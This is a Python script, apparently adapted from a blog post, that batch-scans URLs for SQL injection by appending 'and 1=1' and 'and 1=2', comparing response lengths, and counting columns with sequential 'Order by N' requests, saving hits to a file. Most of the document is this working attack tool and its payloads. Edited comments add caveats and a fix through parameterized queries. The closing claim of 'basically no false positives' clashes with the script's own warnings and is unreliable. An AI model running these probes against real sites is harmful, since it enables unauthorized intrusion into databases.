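# -*- coding: utf-8 -*-
"""Length-based SQL injection check for a single URL or a list of URLs.

Run environment: Python 3. For batch mode, create a Url.txt file in this
directory with one URL per line.

How the check works: each URL is requested twice, once with each suffix in
``Exp``, and the two response body lengths are compared. A difference is
reported as "presence injected". The comparison is a heuristic only:

* pages with dynamic content (timestamps, tokens, rotating banners) differ in
  length between any two requests, which produces false positives;
* a page whose two responses happen to have the same length is reported as
  clean, which produces false negatives.

Treat a hit as a lead to confirm by hand, then fix it in the application with
parameterized queries. The paired ``Exp`` suffixes and the sequential
"Order by N" requests are easy to spot in web-server access logs.
"""
import threading

import requests

# Suffixes appended to the URL under test: one condition that is always true
# and one that is always false.
# NOTE(review): the published listing lost its whitespace, so it is unclear
# whether these originally began with a space; confirm against the original.
Exp = ['and 1=1', 'and 1=2']

# Seconds to wait for each response; the original used 1 in field() and
# Piliang() and no timeout at all in judge(), which could hang indefinitely.
TIMEOUT = 1

# Printed for ANY request failure (timeout, DNS error, bad URL, reset), not
# only for a connection reset by a WAF.
WAF_MESSAGE = u"the site has a WAF and the connection is reset! "

# URL for single-target mode; assigned from the prompt in the entry point.
URL = ""


def logo():
    """Print the author banner."""
    print(" *** ")
    print(" * * ")
    print("Author: * *")
    print("Screw *")
    print(" ***** ")
    print(" * ")
    print(" * * ")
    print("Blog: * *")
    print(" *** ")
    print("http://www.cnblogs.com/pojun/")


def _body_length(target):
    """Return the length of the response body for *target*, or None on failure.

    Only requests' own exceptions are caught, so programming errors and
    Ctrl-C are no longer swallowed the way the original bare ``except`` did.
    """
    try:
        return len(requests.get(target, timeout=TIMEOUT).text)
    except requests.RequestException:
        return None


# Judgment injection point
def judge():
    """Check the module-level ``URL`` and, on a hit, count its fields.

    Exits the program if either request fails, as the original did.
    """
    # Local list: the original appended to a module-level list, so a second
    # call compared the stale lengths from the first call.
    lengths = []
    for suffix in Exp:
        length = _body_length(URL + suffix)
        if length is None:
            print(WAF_MESSAGE)
            raise SystemExit
        lengths.append(length)
    if lengths[1] != lengths[0]:
        print(u'site ======> presence injected!')
        field(URL)
    else:
        print(u'site =======> "no" presence injected!')


# Judgment field
def field(weburl):
    """Estimate the number of fields by comparing consecutive response lengths.

    Requests "Order by 1" through "Order by 30" and reports j-1 at the first j
    whose response length differs from the previous one. Prints nothing when
    no difference is seen within 30 requests.
    """
    previous = None
    for j in range(1, 31):
        # NOTE(review): as with Exp, the whitespace around "Order by" may
        # have been lost in the published listing; confirm before relying on it.
        current = _body_length(weburl + "Order by" + str(j))
        if current is None:
            # The original silently ignored failures on odd-numbered requests
            # and then compared against a stale or empty value, which could
            # report a wrong field count. Stop instead.
            print(WAF_MESSAGE)
            return
        if previous is not None and current != previous:
            print(u"number of fields is ========================>", j - 1)
            return
        previous = current


# Bulk
def Piliang():
    """Run the length comparison for every URL in Url.txt.

    URLs reported as "presence injected" are appended to Ture_sql.txt, one per
    line. A URL whose request fails is reported and skipped.
    """
    # Context manager closes the file; splitlines + strip handles a missing
    # trailing newline (the original dropped the last URL in that case) and
    # skips blank lines.
    with open('Url.txt', encoding="utf-8") as handle:
        targets = [line.strip() for line in handle.read().splitlines()]
    targets = [target for target in targets if target]

    for target in targets:
        print(target)
        lengths = []
        for suffix in Exp:
            length = _body_length(target + suffix)
            if length is None:
                print(WAF_MESSAGE)
                break
            lengths.append(length)
        if len(lengths) != len(Exp):
            # A request failed; move on to the next URL.
            continue
        if lengths[1] == lengths[0]:
            print(u'site ========> "no" presence injected!')
        else:
            print(u'site ========> presence injected!')
            # field(target)
            with open('Ture_sql.txt', 'a') as results:
                results.write(target + '\n')


if __name__ == "__main__":
    print(u'1. Batch injection, exist 1.txt of this catalogue 2. Single point injection, and determine the number of fields')
    try:
        choice = int(input("ID?:"))
    except ValueError:
        # Non-numeric input falls through to the error branch below.
        choice = None
    if choice == 1:
        worker = threading.Thread(target=Piliang)
        worker.start()
        worker.join()
    elif choice == 2:
        URL = input('URL:')
        # judge() already calls field() on a hit. The original also created a
        # second thread for field() and joined it without starting it, which
        # raises RuntimeError; that thread is dropped.
        judge()
    else:
        print(u"input Error! ")
    logo()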
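This is the first script I finished while practicing Python, so its structure is confusing, but it works well. Basically no false positives! (The check compares only the lengths of two responses, so a page with dynamic content can differ for unrelated reasons; a hit should still be confirmed by hand.)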
Python batch detection injection point script